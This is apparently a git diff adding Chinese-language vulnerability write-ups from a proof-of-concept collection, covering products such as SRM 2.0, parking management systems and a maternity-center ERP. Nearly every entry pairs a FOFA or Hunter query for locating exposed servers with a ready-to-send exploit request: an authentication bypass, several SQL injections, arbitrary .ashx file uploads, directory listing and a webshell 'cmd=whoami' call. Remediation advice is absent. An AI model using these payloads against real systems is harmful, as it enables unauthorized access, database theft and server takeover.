+文件路径`http://ip/imgnews/imgad/000000/upload.aspx?cmd=whoami`
\ No newline at end of file
diff --git a/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md b/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md
new file mode 100644
index 0000000..7ae3f10
--- /dev/null
+++ b/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md
@@ -0,0 +1,20 @@
+# 智联云采SRM2.0系统接口autologin身份认证绕过漏洞
+
+由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷，导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台，造成信息泄露，使系统处于极不安全的状态。
+
+## fofa
+
+```yaml
+title=="SRM 2.0"
+```
+
+## poc
+
+```java
+GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
+Host: 
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031840266.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031840544.png)
\ No newline at end of file
diff --git a/智联云采testService存在SQL注入漏洞.md b/智联云采testService存在SQL注入漏洞.md
new file mode 100644
index 0000000..07fcf6d
--- /dev/null
+++ b/智联云采testService存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 智联云采testService存在SQL注入漏洞
+
+智联云采testService存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息。
+
+## fofa
+
+```yaml
+title=="SRM 2.0"
+```
+
+## poc
+
+```java
+POST /adpweb/a/ica/api/testService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Content-Type: application/json
+
+{
+    "dbId": "1001",
+    "dbSql": "#set ($lang = $lang) SELECT * FROM v$version",
+    "responeTemplate": "{\"std_data\": {\"execution\": {\"sqlcode\": \"$execution.sqlcode\", \"description\": \"$execution.description\"}}}",
+    "serviceCode": "q",
+    "serviceName": "q",
+    "serviceParams": "{\"lang\":\"zh_CN\"}"
+}
+```
+
+![image-20241018154644283](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181546560.png)
+
+![image-20241018154704052](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181547135.png)
\ No newline at end of file
diff --git a/智能停车管理系统GetPasswayData存在SQL注入漏洞.md b/智能停车管理系统GetPasswayData存在SQL注入漏洞.md
new file mode 100644
index 0000000..5b7c53c
--- /dev/null
+++ b/智能停车管理系统GetPasswayData存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 智能停车管理系统GetPasswayData存在SQL注入漏洞
+
+停车场后台管理系统 GetPasswayData 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用&nbsp;SQL&nbsp;注入漏洞获取数据库中的信息。
+
+## fofa
+
+```yaml
+icon_hash="938984120"
+```
+
+## poc
+
+```java
+POST /LaneMonitor/GetPasswayData HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ 
+SentryHost_No=1';SELECT+SLEEP(5)#
+```
+
diff --git a/智能停车管理系统ToLogin存在SQL注入漏洞.md b/智能停车管理系统ToLogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..6dca068
--- /dev/null
+++ b/智能停车管理系统ToLogin存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 智能停车管理系统ToLogin存在SQL注入漏洞
+
+停车场后台管理系统 ToLogin 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用&nbsp;SQL&nbsp;注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+icon_hash="938984120"
+```
+
+## poc
+
+```java
+POST /Login/ToLogin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ 
+Admins_Account=1' AND (SELECT 8104 FROM (SELECT(SLEEP(5)))dEPM) AND 'JYpL'='JYpL&Admins_Pwd=
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162052998.png)
diff --git a/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md b/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md
new file mode 100644
index 0000000..6fcaccc
--- /dev/null
+++ b/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md
@@ -0,0 +1,12 @@
+## 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞
+
+## fofa
+```
+app="ZY-人力资源管理系统"
+```
+
+## poc
+```
+http://127.0.0.1:8085/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select+@@version))%2B%27
+```
+
diff --git a/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md b/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md
new file mode 100644
index 0000000..a3e8cb6
--- /dev/null
+++ b/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 智跃人力资源管理系统 GenerateEntityFromTable.aspx SQL注入漏洞
+
+# 一、漏洞简介
+智跃人力资源管理系统是基于B/S网页端广域网平台，一套考勤系统即可对全国各地多个分公司进行统一管控，成本更低。信息共享更快。跨平台，跨电子设备。智跃人力资源管理系统 GenerateEntityFromTable.aspx SQL注入漏洞，攻击者可通过该漏洞获取数据库权限。
+
+# 二、影响版本
++ 智跃人力资源管理系统
+
+# 三、资产测绘
++ hunter`web.body="ZY.LOGO.64.png"`
++ 特征
+
+![1700999921759-eb1f0195-0120-4c54-8bc9-5818fb075b7e.png](./img/94IJ8Ml0P1Ag0IDx/1700999921759-eb1f0195-0120-4c54-8bc9-5818fb075b7e-497556.png)
+
+# 四、漏洞复现
+```plain
+/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select%20SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%271230%27)),3,32)))%2B%27
+```
+
+![1700999949055-76cc2f2c-0826-473c-943e-676e36dc5e33.png](./img/94IJ8Ml0P1Ag0IDx/1700999949055-76cc2f2c-0826-473c-943e-676e36dc5e33-974501.png)
+
+sqlmap
+
+```plain
+/resource/utils/GenerateEntityFromTable.aspx?t=1
+```
+
+![1701000199428-d43731eb-8092-4b6d-9abc-9a57e4a8f9ae.png](./img/94IJ8Ml0P1Ag0IDx/1701000199428-d43731eb-8092-4b6d-9abc-9a57e4a8f9ae-184237.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zwvy0quhfwnddcae>
\ No newline at end of file
diff --git a/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md b/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md
new file mode 100644
index 0000000..4a5401f
--- /dev/null
+++ b/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 智邦国际ERP GetPersonalSealData.ashx接口SQL注入漏洞
+
+# 一、漏洞复现
+智邦国际ERP系统 GetPersonalSealData.ashx接口处存在SQL注入漏洞，未经身份认证的攻击者可利用此漏洞获取数据库敏感信息，深入利用可获取服务器权限。
+
+# 二、影响版本
++ 智邦国际ERP
+
+# 三、资产测绘
++ web.icon=="0ab4ed9764a33fd85da03b00f44393e1"
++ 特征
+
+![1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8.png](./img/OhYF0vdN8XPJVPA_/1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8-639576.png)
+
+# 四、漏洞复现
+```java
+GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=%31%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%32%32%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%36%38%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%38%36%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%37%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%37%36%29%2b%43%48%41%52%28%31%30%34%29%2b%43%48%41%52%28%38%32%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%38%38%29%2b%43%48%41%52%28%31%31%38%29%2b%43%48%41%52%28%37%35%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%37%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%39%29%2b%43%48%41%52%28%38%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%31%29%2b%43%48%41%52%28%31%30%38%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%31%30%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%38%34%29%2b%43%48%41%52%28%38%35%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%30%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2d%2d%20%79%68%6c%73 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=o0oxkf2lkudmy5ueprfeapbl
+Upgrade-Insecure-Requests: 1
+```
+
+![1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790.png](./img/OhYF0vdN8XPJVPA_/1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790-137621.png)
+
+```java
+qzbbqDnuoIViFWuALhRoiXvKeCeEYeBGlBImeTUAnAbdWqqqqq
+```
+
+sqlmap
+
+```java
+/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1
+```
+
+![1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c.png](./img/OhYF0vdN8XPJVPA_/1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c-432838.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eqzw1z2g14rwg6ue>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md b/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md
new file mode 100644
index 0000000..28d4b1b
Binary files /dev/null and b/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md differ
diff --git a/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md b/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md
new file mode 100644
index 0000000..bcee927
--- /dev/null
+++ b/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 月子会所ERP管理云平台BasicInfo任意文件上传漏洞
+
+# 一、漏洞简介
+月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤，BasicInfo接口可上传任意文件，攻击者可利用该漏洞获取服务器控制权。
+
+# 二、影响版本
++ 月子会所ERP管理云平台
+
+# 三、资产测绘
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/tko20JbtQ88aBvJ4/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-831920.png)
+
+# 四、漏洞复现
+```plain
+POST /Page/BasicInfo/ashx/UpLoadHandler.ashx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_301
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 481
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+
+```
+
+![1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7.png](./img/tko20JbtQ88aBvJ4/1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7-050105.png)
+
+根据响应拼接上传地址
+
+```plain
+/UploadBaseFolder/Contact/2309259440240.ashx
+```
+
+![1695621179771-1de55016-f429-4050-b796-b55a87d0f961.png](./img/tko20JbtQ88aBvJ4/1695621179771-1de55016-f429-4050-b796-b55a87d0f961-012351.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gfk4yt1xarmph0m3>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md b/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md
new file mode 100644
index 0000000..a193306
Binary files /dev/null and b/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md differ
diff --git a/月子会所ERP管理云平台GetData.ashx存在SQL注入.md b/月子会所ERP管理云平台GetData.ashx存在SQL注入.md
new file mode 100644
index 0000000..795f75d
--- /dev/null
+++ b/月子会所ERP管理云平台GetData.ashx存在SQL注入.md
@@ -0,0 +1,21 @@
+# 月子会所ERP管理云平台GetData.ashx存在SQL注入
+
+月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
+```
+
+## poc
+```javascript
+GET /Page/BasicInfo/ashx/GetData.ashx?ChannelId=&ClientName=1&FitemId=null&Phone=1{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4798=4798) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)))-- uTFu)}}&RequestMethod=ApplyActivity&SaleId= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241227222800031](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272228089.png)
\ No newline at end of file
diff --git a/月子会所ERP管理云平台ICManager任意文件上传漏洞.md b/月子会所ERP管理云平台ICManager任意文件上传漏洞.md
new file mode 100644
index 0000000..03f8500
--- /dev/null
+++ b/月子会所ERP管理云平台ICManager任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 月子会所ERP管理云平台ICManager任意文件上传漏洞
+
+# <font style="color:#080808;background-color:#ffffff;">一、漏洞简介</font>
+<font style="color:#080808;background-color:#ffffff;">月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤，可上传任意文件，攻击者可利用该漏洞获取服务器控制权。</font>
+
+# <font style="color:#080808;background-color:#ffffff;">二、影响版本</font>
++ <font style="color:#080808;background-color:#ffffff;">月子会所ERP管理云平台</font>
+
+# <font style="color:#080808;background-color:#ffffff;">三、资产测绘</font>
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/E9mmf8vZc6XPsq9a/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-894601.png)
+
+# <font style="color:#080808;background-color:#ffffff;">四、漏洞复现</font>
+```plain
+POST /Page/ICManager/ashx/Handler.ashx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_301
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 497
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+
+```
+
+![1695622920151-0f825dda-fba9-4034-a568-f6cea0263720.png](./img/E9mmf8vZc6XPsq9a/1695622920151-0f825dda-fba9-4034-a568-f6cea0263720-007458.png)
+
+根据回显拼接上传文件位置
+
+```plain
+/UploadBaseFolder/Contact/230925754082.ashx
+```
+
+![1695622959930-af81fc07-8b36-4612-810d-3acdb51c7a25.png](./img/E9mmf8vZc6XPsq9a/1695622959930-af81fc07-8b36-4612-810d-3acdb51c7a25-056786.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ylu5mwr0gg4g1s8p>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md b/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md
new file mode 100644
index 0000000..4a37639
Binary files /dev/null and b/月子会所ERP管理云平台MicroMall任意文件上传漏洞.md differ
diff --git a/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md b/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md
new file mode 100644
index 0000000..163d59d
Binary files /dev/null and b/月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md differ
diff --git a/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md b/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md
new file mode 100644
index 0000000..646b5a7
--- /dev/null
+++ b/月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞
+
+# 一、漏洞简介
+月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。
+
+# 二、影响版本
++ 月子会所ERP管理云平台
+
+# 三、资产测绘
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/PbyyHJcsNm9df-Mp/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-570049.png)
+
+# 四、漏洞复现
+```java
+GET /Page/SalerManager/SelectUserMangerPrint.aspx?id=1%29+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2882%29%2BCHAR%28113%29%2BCHAR%2870%29%2BCHAR%28108%29%2BCHAR%2883%29%2BCHAR%28111%29%2BCHAR%28106%29%2BCHAR%2888%29%2BCHAR%2878%29%2BCHAR%2884%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28103%29%2BCHAR%28110%29%2BCHAR%28109%29%2BCHAR%2897%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%2876%29%2BCHAR%2878%29%2BCHAR%2880%29%2BCHAR%28113%29%2BCHAR%2868%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%2878%29%2BCHAR%2898%29%2BCHAR%2890%29%2BCHAR%28108%29%2BCHAR%28113%29%2BCHAR%2874%29%2BCHAR%2883%29%2BCHAR%2868%29%2BCHAR%2882%29%2BCHAR%28117%29%2BCHAR%2873%29%2BCHAR%2877%29%2BCHAR%2874%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EfIE HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=mf1ihdp1nrlqfspeocl1np1d
+Upgrade-Insecure-Requests: 1
+```
+
+![1710301276767-6643edd8-3299-4694-90cd-424500930546.png](./img/PbyyHJcsNm9df-Mp/1710301276767-6643edd8-3299-4694-90cd-424500930546-346858.png)
+
+```java
+qqxbqRqFlSojXNTpzgnmaqktHLNPqDvpNbZlqJSDRuIMJqzvxq
+```
+
+sqlmap
+
+```java
+/Page/SalerManager/SelectUserMangerPrint.aspx?id=1
+```
+
+![1710301303427-1c124b60-b297-4df6-9ce0-f9df37306055.png](./img/PbyyHJcsNm9df-Mp/1710301303427-1c124b60-b297-4df6-9ce0-f9df37306055-662745.png)
+
+
+
+> 更新: 2024-04-17 17:13:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fef6ey5vk0gh2g2s>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md b/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md
new file mode 100644
index 0000000..aef782e
--- /dev/null
+++ b/月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md
@@ -0,0 +1,61 @@
+# 月子会所ERP管理云平台UploadComponent任意文件上传漏洞
+
+# 一、漏洞简介
+月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤，可上传任意文件，攻击者可利用该漏洞获取服务器控制权。
+
+# 二、影响版本
++ 月子会所ERP管理云平台
+
+# 三、资产测绘
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/gY9C_r2Y0iYGY2BO/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-072945.png)
+
+# 四、漏洞复现
+```plain
+POST /Page/UploadComponent/UploadComponentHandler.ashx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 481
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+```
+
+![1693185672475-3ec6cca2-4d1a-4ca1-bb1a-511929b82e4a.png](./img/gY9C_r2Y0iYGY2BO/1693185672475-3ec6cca2-4d1a-4ca1-bb1a-511929b82e4a-206384.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/UploadBaseFolder/ERP/202308/1_230828092026228129.ashx
+```
+
+![1693185711006-d52a0121-dbfa-4151-91a9-8a68a5ca3edb.png](./img/gY9C_r2Y0iYGY2BO/1693185711006-d52a0121-dbfa-4151-91a9-8a68a5ca3edb-460244.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kwthyxdkdkmqfpfc>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台upload任意文件上传漏洞.md b/月子会所ERP管理云平台upload任意文件上传漏洞.md
new file mode 100644
index 0000000..de90a92
--- /dev/null
+++ b/月子会所ERP管理云平台upload任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 月子会所ERP管理云平台upload任意文件上传漏洞
+
+# <font style="color:#080808;background-color:#ffffff;">一、漏洞简介</font>
+<font style="color:#080808;background-color:#ffffff;">月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤，可上传任意文件，攻击者可利用该漏洞获取服务器控制权。</font>
+
+# <font style="color:#080808;background-color:#ffffff;">二、影响版本</font>
++ <font style="color:#080808;background-color:#ffffff;">月子会所ERP管理云平台</font>
+
+# <font style="color:#080808;background-color:#ffffff;">三、资产测绘</font>
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/voyuHtcl_zUwlhHw/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-255517.png)
+
+# <font style="color:#080808;background-color:#ffffff;">四、漏洞复现</font>
+```plain
+POST /Page/upload/UploadComponentHandler.ashx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_301
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 497
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+
+```
+
+![1695625519716-92e1ae6f-713d-49e3-bcce-dd74452e8993.png](./img/voyuHtcl_zUwlhHw/1695625519716-92e1ae6f-713d-49e3-bcce-dd74452e8993-231673.png)
+
+上传文件位置
+
+```plain
+/UploadBaseFolder/ERP/202309/1_230925150451061741.ashx
+```
+
+![1695625556076-a2555b8c-41e1-4efb-a711-39f2f3929018.png](./img/voyuHtcl_zUwlhHw/1695625556076-a2555b8c-41e1-4efb-a711-39f2f3929018-397938.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ge2r9u2fgwniwh1q>
\ No newline at end of file
diff --git a/月子会所ERP管理云平台存在目录遍历漏洞.md b/月子会所ERP管理云平台存在目录遍历漏洞.md
new file mode 100644
index 0000000..69be164
--- /dev/null
+++ b/月子会所ERP管理云平台存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# 月子会所ERP管理云平台存在目录遍历漏洞
+
+# 一、漏洞简介
+月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件，管控月子中心经营过程中各个环节。武汉金同方科技月子会ERP管理云平台存在目录遍历漏洞，攻击者可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ 月子会所ERP管理云平台
+
+# 三、资产测绘
++ fofa`product="妈妈宝盒-ERP"`
++ 登录页面
+
+![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/26m4xlcMgRMyEUJ7/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-437960.png)
+
+# 四、漏洞复现
+```plain
+http://xx.xx.xx.xx/Page/
+```
+
+![1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08.png](./img/26m4xlcMgRMyEUJ7/1693186499483-de262214-f715-46e2-9591-44bfe7eb1c08-999200.png)
+
+
